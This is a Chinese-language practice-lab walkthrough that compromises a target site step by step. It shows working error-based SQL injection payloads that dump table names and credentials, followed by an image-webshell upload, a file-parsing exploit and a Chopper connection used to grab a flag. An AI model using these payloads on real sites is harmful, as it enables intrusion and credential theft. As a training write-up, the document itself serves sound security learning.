信息收集1–靶场练习
靶场地址:靶场
开启靶场:
- 打开就一个网页,平平无奇。
- 点点功能点,没发现什么可以利用的
- 尝试扫描一波目录,直接御剑扫描就行,这里使用的是kali的dirsearch,发现了/admin,访问:
. - 先尝试弱口令登录
- admin admin
- 那么尝试sql注入,先加个’ 尝试一下
- 这里回显出sql语句,那么存在sql注入漏洞
- 尝试报错注入:
admin' or extractvalue(1,concat(0x7e,database())) #
- 这里爆出了数据库:caidian
- 那么说明报错注入有效
- 接着报错注入:
admin' or extractvalue(1,concat(0x7e,@@basedir)) #
- 继续:
admin' or gtid_subset(concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema="caidian")),1) #
- 这里发现了manage 表,一般账号密码都保存在一些敏感目录,直接查看其中的列:
admin' or gtid_subset(concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name="manage")),1) #
- 果然如此,发现了user,name,password等,那么继续:
admin' or gtid_subset(concat(0x7e,(select group_concat(concat(user,name,password)) from caidian.manage)),1) #
- 这里发现了其中的user,password等内容,但是其中密码一般会采用md5加密,那么将后面的密码密文找到md5解密网站解密得到其中的zkaqsea账户的密码为:seazkaq
登录后台,尝试获取权限
采用sql注入出来的用户名密码登录后台
也是成功登录,直接点击可用功能点,逐个测试,没有找到相关的信息,那么就想办法getshell了
这里发现上传点,并且好像只能上传图片格式,那么只能写一个图片马,上传!
copy 11.jpg /b +3.asp /a 22.jpg #将图片文件(qq.png)和一句话木马文件(guo.asp)合称为同一个文件(test.jpg)
上传后,发现这里的中间件版本
这里存在文件解析漏洞,那么可以通过这个漏洞,完成getshell
那么这里访问刚才上传成功的jpg文件,后面加上/.php
看到访问页面为乱码,这就说明解析漏洞利用成功了,那么直接菜刀连接:
密码是刚才图片马中的值
- 小tips:
- 这里的flag在fannu–>files–>config.php文件中
`